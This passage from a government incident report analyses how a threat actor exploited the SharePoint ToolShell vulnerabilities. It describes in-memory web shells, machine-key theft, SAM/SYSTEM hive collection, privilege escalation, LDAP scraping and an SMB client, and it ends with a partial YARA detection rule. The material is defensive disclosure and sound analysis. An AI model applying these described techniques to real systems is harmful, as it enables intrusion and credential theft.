This incident demonstrates how even well-prepared teams can be affected by issues outside of their control: although the victims in this use case upheld strong security practices and took appropriate precautions, they were impacted by an unforeseeable software defect.</p> <!-- Figure 1 --> <section class="panel panel-default col-md-12"><div class="panel-body"> <h3 class="text-center h5" id="fig1"><strong>Figure 1: Timeline of events associated with SharePoint vulnerabilities</strong></h3> <figure><img alt="Figure 1 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig1-e.png" /></figure><details><summary>Long description – Timeline of events associated with SharePoint vulnerabilities</summary><ul class="list-unstyled"><li><strong>Day -12:</strong> Initial access using SharePoint CVE, script execution and data exfiltration (until Day -8)</li> <li><strong>Day -8:</strong> SMB lateral movement and lateral movement to IIS servers</li> <li><strong>Day -10:</strong> SMB lateral movement (until Day -2), lateral movement to IIS servers (until Day -2), script executions (until Day -1), and data exfiltration (until Day -1)</li> <li><strong>Day 0:</strong> CVEs published (CVE-2025-53770 and CVE-2025-53771)</li> <li><strong>Day 2:</strong> Patches released</li> <li><strong>Day 9:</strong> Last known actor activity on network</li> </ul></details></div> </section><p>The Cyber Centre confirmed that activities exploiting the SharePoint vulnerabilities were observed as early as Day -12, consistent with the following recent reports:</p> <ul><li><a href="https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/">Disrupting active exploitation of on-premises SharePoint vulnerabilities (Microsoft)</a></li> <li><a 
href="https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/">Active Exploitation of Microsoft SharePoint Vulnerabilities: Threat Brief (Palo Alto’s Unit42)</a></li> </ul><p>However, a key indicator of compromise (IoC) shared by Microsoft in its July 19 <a href="https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/">customer guidance for SharePoint vulnerability CVE-2025-53770</a>—the presence of a file called spinstall0.aspx—was not found during the incident in question. This demonstrates that the threat actor initially exploited the server and then used a novel technique with custom .NET payloads to gain and maintain code execution. Therefore, the spinstall0.aspx file (or variations on it) was not observed as part of the attack path, nor was a PowerShell process spawned by Internet Information Services (IIS).</p> <p>Having established an initial foothold in the network, the threat actor moved to an additional server to perform reconnaissance, solidify their access and establish persistence through discovery and lateral movement. To achieve this, they uploaded several different custom .NET payloads directly into the IIS process memory over a period of several hours. 
These payloads included:</p> <ul><li>a module to intercept requests for legitimate files on the web server based on certain criteria</li> <li>a module to extract cryptographic configuration values to facilitate subsequent exploitation on the web server</li> <li>a module to read and exfiltrate the host’s Security Account Manager (SAM) password database for offline cracking</li> <li>a Server Message Block (SMB) client to perform reconnaissance on the network</li> <li>a filesystem crawler</li> <li>a Lightweight Directory Access Protocol (LDAP) querying tool</li> </ul><p>These payloads were frequently combined with a privilege escalation exploit and an encryption module.</p> <!-- Figure 2 --> <section class="panel panel-default col-md-8 col-md-offset-1"><div class="panel-body"> <h3 class="text-center h5" id="fig2"><strong>Figure 2: Attack path depicting how the threat actor gained access and moved through the environment</strong></h3> <figure><img alt="Figure 2 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig2-e.png" /></figure><details><summary>Long description – Attack path depicting how the threat actor gained access and moved through the environment</summary><p>The image illustrates an attack flow starting with an external threat actor exploiting a SharePoint server in the DMZ (Step 1). From the SharePoint server, the attacker collects information and performs privilege escalation (Step 2). The attacker performs account discovery from the domain controller (Step 3). The attacker moves laterally to an IIS server (Step 4). The attacker shows interest in the internal exchange server (Step 5). The attacker moves laterally into the internal network (Step 6).</p> </details></div> </section><div class="clearfix"> </div> <p>The threat actor used Hypertext Transfer Protocol Secure (HTTPS) externally to access compromised servers and exfiltrate data. 
They used SMB internally to perform reconnaissance and stage a new web shell on a separate IIS web server that was not running SharePoint. The threat actor leveraged compromised network devices to obfuscate their true origin and access the victims’ network from unpredictable IP addresses. This allowed them to blend in with normal traffic and reduced the usefulness of IP-based IoCs for tracking and discovery.</p> <p>From both beachheads, the threat actor proceeded to connect to multiple devices on the internal network and scrape the domain controller and LDAP servers for information.</p> <p>The last known activity on the network by the threat actor occurred on Day 9, with some subsequent reconnaissance activity touching cloud resources using previously compromised credentials. As of this writing, we continue to observe persistent malicious efforts to access both on-prem and cloud infrastructure using these credentials, which have since been rotated.</p> </section><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <!-- Section: Analysis of the incident --> <section><h2 class="text-info" id="analysis">Analysis of the incident</h2> <section class="alert alert-info"><p><strong>Disclaimer:</strong> Comments in source code were added as part of reverse-engineering efforts and are not present in the original samples.</p> </section><p>The Cyber Centre analyzed host and network activity by leveraging telemetry from its sensors. The victims also provided snapshots in time of firewall and Hypertext Transfer Protocol (HTTP) access logs, which were crucial in tracing the compromise back to its very beginning. Ultimately, it was the analysis of dozens of custom in-memory payloads that provided the full story.</p> <p>These payloads consisted of dynamic-link libraries (DLL) loaded into memory over a period of several weeks. 
The Cyber Centre extracted these payloads from running processes on compromised hosts after the common vulnerabilities and exposures (CVEs) were made public, and then reverse engineered them. This provided valuable insight into the extent of the SharePoint compromise and the threat actor’s intent and activities.</p> <h3>MITRE ATT&amp;CK techniques observed during analysis</h3> <p>The information below is based on the attack path outlined in <a href="#fig2">figure 2</a>.</p> <h4 class="text-info">Observation 1</h4> <ul><li>Main techniques <ul><li>Exploit public-facing application (<a href="https://attack.mitre.org/techniques/T1190/">T1190</a>)</li> <li>Server software component: web shell (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>)</li> </ul></li> <li>Additional techniques <ul><li>Exfiltration over alternative protocol: exfiltration over symmetric encrypted non-C2 protocol (<a href="https://attack.mitre.org/techniques/T1048/001/">T1048.001</a>)</li> <li>Compromise infrastructure: network devices (<a href="https://attack.mitre.org/techniques/T1584/008/">T1584.008</a>)</li> </ul></li> </ul><h4 class="text-info">Observation 2</h4> <ul><li>Main techniques <ul><li>System information discovery (<a href="https://attack.mitre.org/techniques/T1082/">T1082</a>)</li> <li>Exploitation for privilege escalation (<a href="https://attack.mitre.org/techniques/T1068/">T1068</a>)</li> <li>OS credential dumping: security account manager (<a href="https://attack.mitre.org/techniques/T1003/002/">T1003.002</a>)</li> </ul></li> <li>Additional techniques <ul><li>Data from local system (<a href="https://attack.mitre.org/techniques/T1005/">T1005</a>)</li> <li>Unsecured credentials: credentials in files (<a href="https://attack.mitre.org/techniques/T1552/001/">T1552.001</a>)</li> </ul></li> </ul><h4 class="text-info">Observation 3</h4> <ul><li>Main techniques <ul><li>Account discovery: local account (<a href="https://attack.mitre.org/techniques/T1087/001/">T1087.001</a>)</li> 
</ul></li> <li>Additional techniques <ul><li>Account discovery: domain account (<a href="https://attack.mitre.org/techniques/T1087/002/">T1087.002</a>)</li> </ul></li> </ul><h4 class="text-info">Observation 4</h4> <ul><li>Main techniques <ul><li>Remote services: SMB/Windows admin shares (<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a>)</li> <li>Server software component: web shell (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>)</li> </ul></li> <li>Additional techniques <ul><li>Exfiltration over alternative protocol: exfiltration over symmetric encrypted non-C2 protocol (<a href="https://attack.mitre.org/techniques/T1048/001/">T1048.001</a>)</li> <li>Compromise infrastructure: network devices (<a href="https://attack.mitre.org/techniques/T1584/008/">T1584.008</a>)</li> </ul></li> </ul><h4 class="text-info">Observation 5</h4> <ul><li>Main techniques <ul><li>Email collection (<a href="https://attack.mitre.org/techniques/T1114/">T1114</a>)</li> </ul></li> </ul><h4 class="text-info">Observation 6</h4> <ul><li>Main techniques <ul><li>Remote services: SMB/Windows admin shares (<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a>)</li> </ul></li> <li>Additional techniques <ul><li>Valid accounts: domain accounts (<a href="https://attack.mitre.org/techniques/T1078/002/">T1078.002</a>)</li> <li>Remote services: remote desktop protocol (<a href="https://attack.mitre.org/techniques/T1021/001/">T1021.001</a>)</li> </ul></li> </ul><p>Further analysis revealed that:</p> <ul><li>the initial exploitation dated back to Day -12, almost 2 weeks earlier than the CVEs’ public disclosure on July 19</li> <li>a significant number of malicious activities followed the preliminary compromise, leveraging more than 50 distinct payloads over a period of several weeks</li> <li>the threat actor had a keen interest in acquiring and exfiltrating documents on accessible file shares and used SMB protocol to access them</li> <li>many 
payloads were dynamically generated and contained hard-coded values such as server names and paths; some of these included occasional typos, which were fixed in subsequent uploads. These dynamically generated payloads limited the usefulness of hash-based IoCs</li> </ul><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!-- Observed technique 1 --> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 1: Initial access (TA0001)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Exploit public-facing application (<a href="https://attack.mitre.org/techniques/T1190/">T1190</a>)</span></p> <p>The threat actor leveraged vulnerabilities to gain remote code execution (RCE) on an Internet-exposed SharePoint server (<a href="https://attack.mitre.org/techniques/T1190/">T1190</a>). Initial access occurred on Day -12, 2 weeks before the public disclosure of vulnerabilities, and was achieved through the exploitation of CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771, an exploit chain also known as ToolShell. 
The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-53770 to its <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">Known Exploited Vulnerabilities Catalog</a> on July 20, followed by CVE-2025-49704 and CVE-2025-49706 on July 22.</p> </div> </div> <!-- Observed technique 2 --> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 2: Persistence (TA0003)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Server software component: web shell (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>)</span></p> <p>The threat actor implemented custom-developed code designed to intercept and manipulate web server requests to legitimate files for tailored processing (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>). This code allowed interactions that facilitated the collection of internal system and network information and enabled the exfiltration of sensitive data from the compromised environment. Meanwhile, the chosen endpoint to stage subsequent activity allowed the threat actor to blend their traffic with normal application traffic. In the figure below, ows.js is a legitimate SharePoint file that the threat actor chose to use in an attempt to blend in and should not be considered an IoC.</p> <!-- Figure 3 coding --> <h5 class="text-center" id="fig3"><strong>Figure 3: Sample of web shell request handler</strong></h5> <figure><img alt="Figure 3 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig3-e.png" /></figure><details><summary>Long description – Sample of web shell request handler</summary><p>The image contains a snippet of C# code that defines a method named OnPostAuthenticateRequestCurrent, which acts as a custom HTTP request handler. 
The method intercepts requests to a specific SharePoint JavaScript file (/_layouts/15/ows.js) and processes a custom header (WWW-Authorization) to potentially execute encrypted commands on the server. The code includes a conditional check to ensure the request is a GET method and that the WWW-Authorization header exists and has a length of at least 5 characters.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!–Observed technique 3 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 3: Credential access (TA0006)</h4> <p><strong>Observed techniques:</strong> <span class="label label-info">OS credential dumping: security account manager (<a href="https://attack.mitre.org/techniques/T1003/002/">T1003.002</a>); Unsecured credentials: credentials in files (<a href="https://attack.mitre.org/techniques/T1552/001/">T1552.001</a>)</span></p> <p>The threat actor deployed custom code to gather credentials from the operating system (<a href="https://attack.mitre.org/techniques/T1003/002/">T1003.002</a>) and secure access to sensitive information located in configuration files available on the web server (<a href="https://attack.mitre.org/techniques/T1552/001/">T1552.001</a>). Validation and decryption keys for the server were obtained early on, which allowed for subsequent forging of ViewState requests. 
As per Microsoft guidance, once the keys are compromised, patching alone is not sufficient; attackers can continue to achieve code execution through ViewState deserialization until the keys themselves are rotated and the server is restarted.</p> <!-- Figure 4 coding --> <h5 class="text-center" id="fig4"><strong>Figure 4: Sample of exfiltration of cryptographic configuration settings</strong></h5> <figure><img alt="Figure 4 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig4-e.png" /></figure><details><summary>Long description – Sample of exfiltration of cryptographic configuration settings</summary><p>The image shows a C# code snippet that dynamically loads the System.Web assembly and uses reflection to access the MachineKeySection class. It retrieves sensitive configuration details such as validation and decryption keys, as well as compatibility mode, and concatenates them into a string. This information is then added to the HTTP response header under the key "X-TXT-NET," potentially exposing critical security data.</p> </details><div class="clearfix"> </div> <p>The threat actor had also gathered 4 files from the compromised server within a few days of the initial breach (listed in order of occurrence):</p> <ul><li>C:\Windows\System32\config\SAM</li> <li>C:\Windows\System32\config\SYSTEM</li> <li>C:\Windows\System32\config\SECURITY</li> <li>C:\Windows\System32\inetsrv\Config\applicationHost.config</li> </ul><p>The code snippet in <a href="#fig5">figure 5</a> includes a privilege escalation exploit and a New Technology File System (NTFS) parsing library (NTFSLib) to bypass file locking by leveraging raw disk access. 
Access to the 4 system resources listed above allows for offline cracking of credentials.</p> <!-- Figure 5 --> <h5 class="text-center" id="fig5"><strong>Figure 5: Code snippet used to collect the SYSTEM hive from disk</strong></h5> <figure><img alt="Figure 5 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig5-e.png" /></figure><details><summary>Long description – Code snippet used to collect the SYSTEM hive from disk</summary><p>The image shows a C# code snippet that processes an HTTP request if its content length is not zero. It decodes a Base64-encoded string, splits it into an array using directory separator characters, and extracts a file path. The code then interacts with a custom NTFSWrapper class to access raw disk data and retrieve the parent directory entry of the specified path, potentially indicating malicious or unauthorized file system access.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!-- Observed technique 4 --> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 4: Discovery (TA0007)</h4> <p><strong>Observed techniques:</strong> <span class="label label-info">Account discovery: local account (<a href="https://attack.mitre.org/techniques/T1087/001/">T1087.001</a>); Account discovery: domain account (<a href="https://attack.mitre.org/techniques/T1087/002/">T1087.002</a>)</span></p> <p>Over a 2-week period, the domain controller hosting the LDAP service was queried by the threat actor 19 times to collect information on users, service accounts, groups, administrators and user mailboxes.</p> <!-- Figure 6 --> <h5 class="text-center" id="fig6"><strong>Figure 6: Sample of LDAP 
scraping</strong></h5> <figure><img alt="Figure 6 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig6-e.png" /></figure><details><summary>Long description – Sample of LDAP scraping</summary><p>The image shows a C# code snippet that performs an LDAP query on a specified domain to search for directory entries matching a given filter. The results are serialized into JSON format, encrypted using AES with predefined keys, and then encoded in Base64 before being written to the HTTP response. This code appears to facilitate unauthorized access or exfiltration of directory information.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!-- Observed technique 5 --> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 5: Collection (TA0009)</h4> <p><strong>Observed techniques:</strong> <span class="label label-info">Data from local system (<a href="https://attack.mitre.org/techniques/T1005/">T1005</a>); Email collection (<a href="https://attack.mitre.org/techniques/T1114/">T1114</a>)</span></p> <p>The threat actor leveraged their access to gather information related to the local system (<a href="https://attack.mitre.org/techniques/T1005/">T1005</a>) and unsuccessfully attempted to pivot to the internal mail server (<a href="https://attack.mitre.org/techniques/T1114/">T1114</a>). 
The following data collection techniques targeted the filesystem and local storage.</p> <!-- Figure 7 --> <h5 class="text-center" id="fig7"><strong>Figure 7: Sample of file collection from the local system</strong></h5> <figure><img alt="Figure 7 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig7-e.png" /></figure><details><summary>Long description – Sample of file collection from the local system</summary><p>The image shows a C# code snippet that appears to enumerate directories and files within a specified path (C:\\users\\) and collects metadata such as last write time, creation time, and file size. The gathered information is processed into a string, encrypted using AES with predefined keys, and potentially sent as part of an HTTP response. This code suggests functionality for unauthorized data collection and exfiltration.</p> </details><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <p>Of note, the actor attempted to pivot to an internal webmail server proxied through the compromised SharePoint server.</p> <!-- Figure 8 --> <h5 class="text-center" id="fig8"><strong>Figure 8: Sample of email collection</strong></h5> <figure><img alt="Figure 8 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig8-e.png" /></figure><details><summary>Long description – Sample of email collection</summary><p>The image shows a C# code snippet configuring an HttpClient to send an HTTP POST request to a specified URL with custom headers and form-encoded data, including placeholders for sensitive credentials (REDACTED_USERNAME and REDACTED_PASSWORD). 
It sets the security protocol to support SSL3 and TLS12, bypasses SSL certificate validation, and includes a user-agent string mimicking a browser.</p> </details></div> </div> <div class="clearfix"> </div> <!-- Observed technique 6 --> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 6: Privilege escalation (TA0004)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Exploitation for privilege escalation (<a href="https://attack.mitre.org/techniques/T1068/">T1068</a>)</span></p> <p>The threat actor leveraged open-source tools to escalate their privileges and gain access to files and data beyond the reach of the initial compromise (<a href="https://attack.mitre.org/techniques/T1068/">T1068</a>). Artifacts of the <strong>PrintNotifyPotato</strong> privilege escalation tool were observed in several payloads. These allowed the threat actor access to otherwise restricted files. This technique was leveraged in multiple samples, with portions of code and strings directly matching the GitHub project source code.</p> <!-- Figure 9 --> <h5 class="text-center" id="fig9"><strong>Figure 9: Sample of PrintNotifyPotato privilege escalation</strong></h5> <figure><img alt="Figure 9 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig9-e.png" /></figure><details><summary>Long description – Sample of PrintNotifyPotato privilege escalation</summary><p>The image shows a C# code snippet that performs token duplication and thread impersonation using native methods to elevate privileges. It duplicates a SYSTEM token, impersonates it on the current thread, and calls a function (F()) that appears to access sensitive data, such as the Security Account Manager (SAM) file. 
The code includes error handling and writes diagnostic messages to the HTTP response, indicating potential misuse for privilege escalation and data exfiltration.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!-- Observed technique 7 --> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 7: Lateral movement (TA0008)</h4> <p><strong>Observed techniques:</strong> <span class="label label-info">Remote services: SMB/Windows admin shares (<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a>); Remote services: remote desktop protocol (<a href="https://attack.mitre.org/techniques/T1021/001/">T1021.001</a>)</span></p> <p>The threat actor performed reconnaissance and moved laterally in the environment by leveraging SMB connectivity (<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a>). Interestingly, they leveraged both a custom SMB client loaded inside a .NET module as well as the system’s own SMB client while they were active on the network. In addition, unsuccessful attempts to perform Remote Desktop Protocol (RDP) connections further into the network were observed from compromised servers.</p> <!-- Figure 10 --> <h5 class="text-center" id="fig10"><strong>Figure 10: Sample of SMB client</strong></h5> <figure><img alt="Figure 10 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig10-e.png" /></figure><details><summary>Long description – Sample of SMB client</summary><p>The image shows a C# code snippet that processes HTTP input to extract user credentials (user, address, and password) and attempts to establish an SMB connection using these details. 
If the connection succeeds, it serializes and encodes the list of shared resources; otherwise, it encodes a "connection failed" message. The SMB client instance is stored in the application context, suggesting potential misuse for unauthorized access or credential harvesting.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <h4>SMB commands implemented by the sample</h4> <p>In the sample above, we observed the following SMB commands and associated behaviours:</p> <ul><li><strong>cn:</strong> establishes an SMB connection using a username, password, and IP address specified in the request. It saves the SMB connection to HttpApplication.Application["817FE0AC534D44E49"]</li> <li><strong>li:</strong> lists files in the connected SMB resource</li> <li><strong>re:</strong> reads a file from the connected SMB resource</li> <li><strong>we:</strong> writes, appends or creates a file on the connected SMB resource</li> <li><strong>de:</strong> deletes a file on the connected SMB resource</li> <li><strong>di:</strong> disconnects and cleans up the SMB client</li> </ul><p>The use of a bespoke SMB client inside .NET payloads enabled further detection opportunities by looking for outgoing connections over port 445 from the IIS server process, as opposed to the normal pattern of SMB connections originating from the Windows kernel.</p> <!-- Observed technique 8 --> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 8: Persistence (TA0003)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Server software component: web shell (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>)</span></p> <p>After gaining a foothold in the network, the threat actor pivoted to an additional 
Internet-exposed IIS server (not SharePoint) within a matter of days, using the lateral movement techniques previously mentioned. This helped them establish a back-up persistent access point into the network (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>), solidifying their presence, after which they remained dormant for almost 2 weeks.</p> <p>The compromise of a non-SharePoint server emphasizes the need to look beyond initial <abbr title="tactics, techniques and procedures">TTPs</abbr> for signs of lateral movement once an initial compromise is detected.</p> <p>The threat actor returned briefly on Day 9 by leveraging the above-mentioned access. However, because of the Cyber Centre’s improved understanding of the actor’s <abbr title="tactics, techniques and procedures">TTPs</abbr>, alongside newly deployed capabilities, this new activity was quickly detected and stopped.</p> <!-- Figure 11 --> <h5 class="text-center" id="fig11"><strong>Figure 11: Sample of additional web shell path</strong></h5> <figure><img alt="Figure 11 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig11-v2-e.png" /></figure><details><summary>Long description – Sample of additional web shell path</summary><p>The image shows a C# code snippet implementing an HTTP request handler that intercepts POST requests to a specific SharePoint path (/_layouts/15/start.aspx). It processes a Base64-encoded __EVENTVALIDATION parameter, decrypts it using DES, and parses the resulting data to handle specific modes, such as "Get." 
The code includes functionality for compressing and encoding data, suggesting potential misuse for unauthorized data manipulation or exfiltration.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!–Observed technique 9 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 9: Resource development (TA0042)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Compromise infrastructure: network devices (<a href="https://attack.mitre.org/techniques/T1584/008/">T1584.008</a>)</span></p> <p>Indicators suggest that exploitation and exfiltration activities originated from several compromised network devices, including some with close geographical proximity to the target network. For example, the IP address used for the initial exploitation was not the same one subsequently used for ongoing collection and access development. This flexible choice of source IPs allowed the threat actor to blend in with normal traffic and reduced the usefulness of typical IP-based IoCs for tracking, discovery and blocking.</p> </div> </div> <!–Observed technique 10 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 10: Exfiltration (TA0010)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Exfiltration over alternative protocol: exfiltration over symmetric encrypted non-C2 protocol (<a href="https://attack.mitre.org/techniques/T1048/001/">T1048.001</a>)</span></p> <p>The Cyber Centre observed several obfuscation techniques in use during the exfiltration phase related to executing payloads embedded in web server requests. 
The most commonly observed technique was encrypting the result using a symmetric key (<a href="https://attack.mitre.org/techniques/T1048/001/">T1048.001</a>), encoding that result using Base64, and then returning the Base64-encoded buffer as part of the HTTP response from the web server. This encryption is encapsulated inside the regular Transport Layer Security (TLS) connections observed on normal port 443 traffic for the application.</p> </div> </div> </section><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!– Indicators of compromise and recommendations –> <section><h2 class="text-info" id="indicators">Indicators of compromise and recommendations</h2> <p>IoCs were distributed via the Cyber Centre’s automated threat intelligence sharing platform (AVENTAIL) and through alerts and communications by the Canadian Cyber Security Incident Response Team (CSIRT). This ensured that partners across all sectors had the information they needed to act decisively.</p> <p>For up-to-date information on alerts, advisories and guidance relating to the SharePoint vulnerabilities, please refer to the Cyber Centre alert <a href="https://www.cyber.gc.ca/en/alerts-advisories/al25-009-vulnerability-impacting-microsoft-sharepoint-server-cve-2025-53770">Vulnerability Impacting Microsoft SharePoint Server (CVE-2025-53770)</a>.</p> </section><!– Cyber Centre tools and services –><section><h2 class="text-info" id="tools-services">Cyber Centre tools and services</h2> <p>No single tool, service or turnkey solution can reconstruct an incident, trace an attacker’s path or validate a threat on its own. A holistic approach using multiple perspectives is required to conduct a thorough investigation. 
As such, the Cyber Centre relies on multiple layered telemetry sources to detect threats and protect monitored assets.</p> <p>Active scanning tools helped identify Internet-exposed high-priority servers. <a href="https://www.cyber.gc.ca/en/tools-services/assemblyline">AssemblyLine</a> was used to enable triage at scale, processing hundreds of thousands of files per day. The Cyber Centre made enhancements to its <a href="https://github.com/cybercentrecanada/assemblyline-service-dotnet-decompiler">DotnetDecompiler Service</a> to automate the decompilation of .NET executables. This is now available in the Cyber Centre’s open-source repository, allowing the broader cyber security community the benefit of the same advanced capabilities.</p> <p>In response to this incident, the Cyber Centre also created YARA rules to help with the detection of malicious files related to the threat actor’s activity. Additional YARA rules will be released periodically after an evaluation period to ensure accuracy.</p> <p>The sample YARA rule below implements a detection for the LDAP scraping activity found in payloads extracted from the compromised server.</p> <!– Figure 12 –> <section class="panel panel-default col-md-12"><div class="panel-body"> <h3 class="text-center" id="fig12"><strong>Figure 12: YARA rule for LDAP data collection detection</strong></h3> <figure><img alt="Figure 12 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig12-e.png" /></figure><details><summary>Long description – YARA rule for LDAP data collection detection</summary><p>The image shows a YARA rule named WIN_LDAPQuery designed to detect DLL files performing LDAP queries. It includes metadata such as the rule’s purpose, category, and reference to a SharePoint vulnerability advisory. 
The rule identifies suspicious behaviour by matching specific strings related to LDAP operations, encryption, and token handling, combined with conditions targeting file size and string occurrences. The rule as published is named win_ldapquery.</p> <pre class="prettyprint"><span class="wb-inv">Code</span>
rule win_ldapquery {
    meta:
        id = "1vOyulv5H6pIcnCKCQJxyB"
        fingerprint = "69d05a0633335c9c8c739d33e2af3b9f4be01369d4ccefb83e55d2fe094b0a87"
        version = "1.0"
        modified = "2025-08-27"
        status = "RELEASED"
        sharing = "TLP:CLEAR"
        source = "CCCS"
        author = "reveng@CCCS"
        description = "Detect a DLL that is performing a LDAP query."
        category = "MALWARE"
        malware = "ldapquery"
        malware_type = "INFOSTEALER"
        malware_type = "HACKTOOL"
        report = "TA25-0056"
        report = "TA25-0057"
        reference = "https://www.cyber.gc.ca/en/alerts-advisories/al25-009-vulnerability-impacting-microsoft-sharepoint-server-cve-2025-53770"

    strings:
        // Detection of classes and function names (latest version).
        $a1 = "LDir" ascii
        $a2 = "Explore" ascii
        $a3 = "Internals" ascii
        $a4 = "EncryptAes" ascii
        $a5 = "DecryptAes" ascii
        $a6 = "Set Token Error" wide
        $a7 = "AdsDateValue" ascii
        $a8 = "FindHandle" ascii

        // Detection of function names (oldest version).
        $x1 = "JavaScriptSerializer" ascii
        $x2 = "Serialize" ascii
        $x3 = "EncryptAes" ascii
        $x4 = "DecryptAes" ascii
        $x5 = "DirectorySearcher" ascii

        // Product and assembly version.
        $b1 = "0.0.0.0" wide

        // Guid for Internet Explorer (IE) COM object and strings for writing the HTTP response.
        $c1 = "9068270B-0939-11D1-8BE1-00C04FD8D503" ascii
        $c2 = "HttpResponse" ascii
        $c3 = "HttpContext" ascii
        $c4 = "ToBase64String" ascii
        $c5 = "GZipStream" ascii
        $c6 = "CreateEncryptor" ascii

        // Dynamic libraries with extern functions for security token escalation.
        $d1 = "advapi32.dll" ascii
        $d2 = "ntdll.dll" ascii
        $d3 = "kernel32.dll" ascii
        $d4 = "NtQuerySystemInformation" ascii
        $d5 = "OpenProcessToken" ascii
        $d6 = "GetTokenInformation" ascii
        $d7 = "SetThreadToken" ascii
        $d8 = "GetCurrentThreadToken" ascii
        $d9 = "Administrator" wide
        $d10 = "IUSR" wide

